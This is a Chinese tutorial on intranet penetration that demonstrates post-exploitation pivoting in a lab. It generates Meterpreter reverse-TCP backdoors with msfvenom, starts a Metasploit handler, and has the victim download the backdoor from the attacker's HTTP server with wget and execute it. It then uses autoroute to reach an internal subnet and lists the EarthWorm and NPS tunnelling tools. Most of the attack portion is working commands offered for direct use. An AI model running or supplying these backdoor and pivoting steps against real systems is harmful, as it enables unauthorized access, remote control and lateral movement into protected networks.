内网穿透的几个常规方案

内网穿透

内网穿透,也即 NAT 穿透,利用各种隧道技术,以网络防火墙允许的协议,绕过网络防火墙的封锁,实现访问被封锁的目标网络。

Meterpreter

Meterpreter是Metasploit框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个Meterpreter shell的链接。

演示环境

  • kali
    攻击者服务器
    外网IP:192.168.3.147
  • Centos
    受害者服务器
    外网IP:192.168.3.151
    内网IP:192.168.126.11

生成后门

利用msfvenom生成可执行后门,其中lhost为Kali的IP地址。



#Linux靶机  
msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=192.168.3.147 lport=4444  -f elf -o shell
#Windows靶机    
msfvenom -p  windows/meterpreter/reverse_tcp lhost=192.168.3.147 lport=4444  -f exe -o  shell.exe

监听端口

利用msf的handler模块进行监听。



msfconsole
use exploit/multi/handler
#set payload与生成后门模块需相同
set payload linux/x64/meterpreter/reverse_tcp
set LHOST 192.168.3.147
set LPORT 4444
run

后门上传靶机并执行

kali开启Http服务



python -m SimpleHTTPServer 0.0.0.0:8000

Centos下载后门并执行



wget http://192.168.3.147:8000/shell
chmod +x shell
./shell

切换回Kali,可以看到已经接收到Shell并可以执行命令。

logo
logo

设置代理添加路由

查看内网主机网卡,其中192.168.3.0/24可访问,192.168.126.0/24不可访问



run  get_local_subnets

logo

在meterpreter添加路由表



run autoroute -s 192.168.126.0/24

logo

扫描192.168.126.0/24主机端口(选用):
logo

EarthWorm

EW 是一套便携式的网络穿透工具,具有 SOCKS v5服务架设和端口转发两大核心功能,可在复杂网络环境下完成网络穿透。

下载地址:
https://github.com/rootkiter/EarthWorm/blob/master/server/download/ew.zip

NPS

nps是一款轻量级、高性能、功能强大的内网穿透代理服务器。目前支持tcp、udp流量转发,可支持任何tcp、udp上层协议(访问内网网站、本地支付接口调试、ssh访问、远程桌面,内网dns解析等等……),此外还支持内网http代理、内网socks5代理、p2p等,并带有功能强大的web管理端。

下载地址:
https://github.com/ehang-io/nps/releases